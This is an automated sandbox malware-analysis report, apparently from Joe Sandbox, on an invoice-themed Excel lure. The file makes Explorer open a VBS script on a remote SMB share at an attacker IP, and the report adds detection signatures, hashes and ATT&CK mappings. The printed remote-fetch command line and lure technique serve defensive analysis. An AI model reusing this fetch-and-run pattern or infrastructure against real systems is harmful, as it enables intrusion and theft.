Edit tour

Windows Analysis Report
re-march-26-2024-9856.xlsx

Overview

General Information

Sample name:	re-march-26-2024-9856.xlsx
Analysis ID:	1415996
MD5:	0fe64551215d4dd591d98b165d74d986
SHA1:	a507acb09dc6ecabcf510aceaac6febd51f01e72
SHA256:	16663b57e182a8f945a9aa5f70627b4ffbd6369784c5744eff304ecacc40fb7f
Tags:	Invoicexlsx
Infos:

Detection

MAC Stealer

Score:	64
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Yara detected MalDoc

Detected suspicious Microsoft Office reference URL

Opens network shares

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Document misses a certain OLE stream usually present in this Microsoft Office document type

May sleep (evasive loops) to hinder dynamic analysis

Sigma detected: Explorer Process Tree Break

Tries to load missing DLLs

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 2348 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

explorer.exe (PID: 312 cmdline: explorer \\170.130.55.130\share\a\Report-26-2024.vbs.......... MD5: 6DDCA324434FFA506CF7DC4E51DB7935)

explorer.exe (PID: 2244 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 38AE1B3C38FAEF56FE4907922F0385BA)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
drawing1.xml.rels	JoeSecurity_MalDoc_5	Yara detected MalDoc	Joe Security

Sigma Signatures

System Summary

Sigma detected: Explorer Process Tree Break

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber: Data: Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, CommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 564, ProcessCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ProcessId: 2244, ProcessName: explorer.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Exploits

Detected suspicious Microsoft Office reference URL

Source: drawing1.xml.rels

Extracted files from sample: file:///\\170.130.55.130\share\a\report-26-2024.vbs..........

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\24F09391.gif

Jump to behavior

System Summary

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: Enable Editing'. a 14 I 15 16 17 Open 18 19 20 21 22 23 24 Stay in the groove wIth .Micro
Source: Document image extraction number: 0	Screenshot OCR: Enable Editing'. Stay in the groove with Microsoft Office Excel integration with Microsoft Azure C
Source: Document image extraction number: 2	Screenshot OCR: Enable Editing'. Open Stay in the groove wIth Microsoft Office Excel integrauon with Microsoft Az

Source: C:\Windows\SysWOW64\explorer.exe

Memory allocated: 770B0000 page execute and read and write

Jump to behavior

Source: CCE0.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: davhlpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: davhlpr.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msisip.dll	Jump to behavior

Source: classification engine

Classification label: mal64.troj.spyw.expl.winXLSX@3/6@0/0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$re-march-26-2024-9856.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR6DA0.tmp

Jump to behavior

Source: re-march-26-2024-9856.xlsx

OLE indicator, Workbook stream: true

Source: unknown

Process created: C:\Windows\SysWOW64\explorer.exe explorer \\170.130.55.130\share\a\Report-26-2024.vbs..........

Source: unknown	Process created: C:\Windows\SysWOW64\explorer.exe
Source: unknown	Process created: C:\Windows\explorer.exe

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown	Process created: C:\Windows\SysWOW64\explorer.exe explorer \\170.130.55.130\share\a\Report-26-2024.vbs..........
Source: unknown	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding

Source: C:\Windows\SysWOW64\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: re-march-26-2024-9856.xlsx	Initial sample: OLE zip file path = xl/media/image1.gif
Source: re-march-26-2024-9856.xlsx	Initial sample: OLE zip file path = xl/media/image2.gif

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: re-march-26-2024-9856.xlsx

Initial sample: OLE indicators vbamacros = False

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe TID: 2428	Thread sleep time: -120000s >= -30000s			Jump to behavior
Source: C:\Windows\explorer.exe TID: 2836	Thread sleep time: -60000s >= -30000s			Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected MalDoc

Source: Yara match

File source: drawing1.xml.rels, type: SAMPLE

Opens network shares

Source: C:\Windows\SysWOW64\explorer.exe	File opened: \\170.130.55.130\share	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: \\170.130.55.130\share	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: \\170.130.55.130\share	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: \\170.130.55.130\share\a	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: \\170.130.55.130\share	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: \\170.130.55.130\share	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: \\170.130.55.130\share	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: \\170.130.55.130\share\a\Report-26-2024.vbs	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: \\170.130.55.130\share\a\Report-26-2024.vbs	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: \\170.130.55.130\share\	Jump to behavior

Remote Access Functionality

Yara detected MalDoc

Source: Yara match

File source: drawing1.xml.rels, type: SAMPLE

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	1 Exploitation for Client Execution	1 Scripting	1 Process Injection	1 Masquerading	OS Credential Dumping	1 Network Share Discovery	Remote Services	Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	Junk Data	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Virtualization/Sandbox Evasion	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Process Injection	NTDS	3 System Information Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1415996
Start date and time:	2024-03-26 18:06:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	re-march-26-2024-9856.xlsx
Detection:	MAL
Classification:	mal64.troj.spyw.expl.winXLSX@3/6@0/0
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: re-march-26-2024-9856.xlsx

Simulations

Behavior and APIs

Time	Type	Description
17:07:16	API Interceptor	786x Sleep call for process: explorer.exe modified

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	GIF image data, version 89a, 600 x 306
Category:	dropped
Size (bytes):	16958
Entropy (8bit):	7.96408260407503
Encrypted:	false
SSDEEP:	384:aZiUiiutYoQzdcpLOUaE+PkB9rwOzgaT+M5Ia/7jmygOIoPdh73xXch6pquS:a0UiiwQzdch75+MDrwSgaT+M5IaTjpgj
MD5:	73DDF7A82966F15608A98F7E012C94CE
SHA1:	B94A150F2CC610FB2E54B1B7CBB9FC78F294E072
SHA-256:	31D19F23B76A5084784CBC6F9EC4F763D64959EBE8D249C42AD285BA1B7FBA89
SHA-512:	346CB54087921004BCFE8AC6564BEE40DC96E2E3320EFAC736EEBF26B46DC202BFA1DE40754025600AC45394DF5F0C13977CBC36A421946E8B70F498D089B35C
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	GIF89aX.2......6..............e..b..a..g..^..\..h..Z..Y..W..i..k%.m'.n).o..U..R..q..P..O4.r9.t>.wC.y..L..I..KI.\|M.~R..V....F..DZ..^..a..c..e..i..m..t..v................Ar..y..\|..}....................................................?..>..<.............................................................................................:.............................................................................7..7..8..9..:..;..=..A..C..E..F..G..H..K..N%.S,.Y1.]5.`=.fB.jN.sR.wV.zY.\|Z.}[.~\..b..i..m..q..u..t..y..{..}.................................................................................................................................................................................................................!.......,....X.2........H......\(....#J.H....3j.... C..I...(S:\...0c.D....8s.....@W..J...A.]...P.R<J.....j....`..K...h.]...p..K.kJ.x..X.......L.....~....#K.L.....nl.9f.1B..M....S.^....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\24F09391.gif

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	GIF image data, version 89a, 1692 x 810
Category:	dropped
Size (bytes):	40856
Entropy (8bit):	7.9852325920911245
Encrypted:	false
SSDEEP:	768:1i3Ojr8/lZRGe2PWGyIv0lc7VOorhpkaf3783zClQ+lZoN7FYx2YwAJZ6e:1i3OnslDGe2eGyIvJhaaO5Ny4iUe
MD5:	E37F96285A50BA0A0C008716DDA928CA
SHA1:	2D93A4936E38FC782D9FD1C1D1B5702BF4C45EFF
SHA-256:	EA1AEA55C3F4075915CA0C2384EAB6ED16596877D24F893172C10911F3282452
SHA-512:	2EA3F842E81C355E72BF52A5D9C5075D5BC1079DF3CFE23D2C475D8A551ED168ACE8FF3887389B85F01F9845D8537E59151492988D999A16AC2F7979641BA141
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	GIF89a..............=........h..........~..}..~..\|..{..x..{..m..g..h..e..d..Z.yK..c..b..b..`..^..[..W.X4.._..R..O..N.l<.V0.Q.........K..I..H._4.^2.\2.\1.[1.M)..........I..G..E..G..F..D..D.r:.j6.i6.h5.d4.U-.Q.K'.F$..D..A..C..B..A..?.{=.w:.l6.N&.D".?...M..S3.e;.kC.qM.yW.._..h..p..{......................F..A..>..>..=..>..<.~<.~;.}:.{:.z9.y8.u6.Z+.6..1..(......>..@..B..E..H".W.]............?..;..<..;..9.\|9.{7.x5.x7.w6.v5.u4.s5.s3.q2.o1.f..c,.V'.R$.K!....$..~<.~;.~?..D.\|6.z5.x2.v2.p1.n/.m..l-.<..!..x6.v4.y6.w9..>&.Q.......t/.n+.k,.h+.]%.D..B.B.dB.cX.sk..l..}................s..........o&...k!.h........b..Y............................................................................................................}}}zzzmmmkkkaaa^^^XXXUUUPPPIIIBBBAAA333&&&$$$......!.......,..............H......\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@...J...H.*]...P.J.J...X.j....`..K...h.]...p..K...x..........L.....+^....#K.L....3k.....C..M....S.^....

C:\Users\user\AppData\Local\Temp\CCE0.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	1.1464700112623651
Encrypted:	false
SSDEEP:	3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
MD5:	72F5C05B7EA8DD6059BF59F50B22DF33
SHA1:	D5AF52E129E15E3A34772806F6C5FBF132E7408E
SHA-256:	1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
SHA-512:	6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
Malicious:	false
Reputation:	high, very likely benign file
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF1FD7694CB6FBF19E.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Reputation:	high, very likely benign file
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\~$re-march-26-2024-9856.xlsx

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fV:vBFFGS
MD5:	797869BB881CFBCDAC2064F92B26E46F
SHA1:	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256:	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512:	1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious:	false
Reputation:	high, very likely benign file
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

\Device\Mup\170.130.55.130\PIPE\srvsvc

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	GLS_BINARY_LSB_FIRST
Category:	dropped
Size (bytes):	116
Entropy (8bit):	4.25236229454546
Encrypted:	false
SSDEEP:	3:rmHD/tH//llleYhtC4d1ydYhtq5kZty:rmHurYty
MD5:	1FF3DE735A87D719B35ED6D00689168C
SHA1:	6711956511BAB8C677A411EA33830E1A2139AC84
SHA-256:	36A192FDB029E0357EB75DF25BF3C2EF035DBCBB9B811527B7276C5CA6D2177E
SHA-512:	1160A3480E574315832F8A9B60D0A6293A14D3A259EA3B6E220EEC46D72504C66AF2712A7CEF030F0E0F548845FD1AFC1FEC43985FE56614A6AF27FB75C3BA57
Malicious:	false
Preview:	........t........................O2Kp....xZG.n......]..........+.H`.........O2Kp....xZG.n.....,..l..@E............

Static File Info

General

File type:	Microsoft Excel 2007+
Entropy (8bit):	7.908789436560601
TrID:	Excel Microsoft Office Open XML Format document (40004/1) 83.33% ZIP compressed archive (8000/1) 16.67%
File name:	re-march-26-2024-9856.xlsx
File size:	67'571 bytes
MD5:	0fe64551215d4dd591d98b165d74d986
SHA1:	a507acb09dc6ecabcf510aceaac6febd51f01e72
SHA256:	16663b57e182a8f945a9aa5f70627b4ffbd6369784c5744eff304ecacc40fb7f
SHA512:	1f92e43ad5f821d08bb2acc38a4608a9aace356aedaab5df7df11e5151e2658e2d66439af5c1edc30d5d4b06b5dedc736dff54e6f7d0136e0ed12d862f90a888
SSDEEP:	1536:VvAi3OnslDGe2eGyIvJhaaO5Ny4iUvRB75d/wSgE9pgyjxOqTX:JlOsj4yIRAzHiE/7n/tgE9pgyjxR
TLSH:	866301EBF16F4902D3727036884A21E63596A038E525FA5C08197BEE978061733E57EF
File Content Preview:	PK..........!.o;fli...........[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon


Icon Hash:	2562ab89a7b7bfbf

Static OLE Info

General

Document Type:	OpenXML
Number of OLE Files:	1

OLE File "re-march-26-2024-9856.xlsx"

Indicators

Has Summary Info:
Application Name:
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	False

Target ID:	0
Start time:	17:06:53
Start date:	25/03/2024
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase:	0x13f3a0000
File size:	28'253'536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	17:07:16
Start date:	25/03/2024
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	explorer \\170.130.55.130\share\a\Report-26-2024.vbs..........
Imagebase:	0x980000
File size:	2'972'672 bytes
MD5 hash:	6DDCA324434FFA506CF7DC4E51DB7935
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	17:07:20
Start date:	25/03/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Imagebase:	0xff2f0000
File size:	3'229'696 bytes
MD5 hash:	38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

